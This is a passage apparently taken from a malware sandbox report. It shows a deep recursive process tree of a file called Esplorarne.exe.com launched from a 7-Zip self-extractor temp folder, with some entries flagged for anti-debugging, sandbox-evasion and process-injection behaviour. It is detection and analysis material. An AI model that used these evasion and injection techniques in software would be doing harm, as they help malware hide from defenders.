C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
259⤵
PID:7260

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
260⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
261⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
262⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
263⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
264⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
265⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
266⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
267⤵
PID:3608

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
268⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
269⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
270⤵
PID:704

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
271⤵
PID:2036

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
272⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
273⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
274⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
275⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
276⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6548

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
277⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
278⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
279⤵
PID:7940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
280⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
281⤵
PID:7108

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
282⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
283⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
284⤵
PID:1820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
285⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
286⤵
PID:508

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
287⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
288⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
289⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
290⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
291⤵
PID:2404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
292⤵
PID:6724

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
293⤵
PID:1052

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
294⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
295⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
296⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
297⤵
PID:1000

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
298⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
299⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
300⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
301⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
302⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
303⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
304⤵
PID:7652

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
305⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
306⤵
PID:4056

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
307⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
308⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
309⤵
PID:2424

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
310⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
311⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
312⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
313⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
314⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
315⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
316⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
317⤵
PID:3232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
318⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
319⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
320⤵
PID:4348

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
321⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
322⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
323⤵
PID:1480

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
324⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
325⤵
PID:8104

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
326⤵
PID:5624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
327⤵
PID:2832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
328⤵
PID:8112

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
329⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
330⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
331⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
332⤵
PID:2324

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
333⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
334⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
335⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
336⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
337⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
338⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
339⤵
- Suspicious use of SetThreadContext
PID:6744

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
340⤵
PID:7764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
341⤵
PID:5256

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
342⤵
PID:7620

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
343⤵
PID:4816

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
344⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
345⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
346⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
347⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
348⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
349⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
350⤵
PID:7948

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
351⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
352⤵
PID:8180

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
353⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
354⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
355⤵
PID:936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
356⤵
PID:7780

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
357⤵
PID:6572

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
358⤵
PID:7204

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
359⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
360⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
361⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
362⤵
PID:7576

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
363⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
364⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
365⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
366⤵
PID:7656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
367⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
368⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
369⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
370⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
371⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
372⤵
PID:4748

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
373⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
374⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
375⤵
PID:2108

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
376⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
377⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
378⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
379⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
380⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
381⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6180

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
382⤵
PID:6824

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
383⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
384⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
385⤵
PID:7084

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
386⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
387⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
388⤵
PID:8088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
389⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
390⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
391⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
392⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
393⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
394⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
395⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
396⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
397⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
398⤵
PID:3152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
399⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
400⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
401⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
402⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
403⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
404⤵
PID:3080

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
405⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
406⤵
PID:2392

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
407⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
408⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
409⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
410⤵
PID:5568

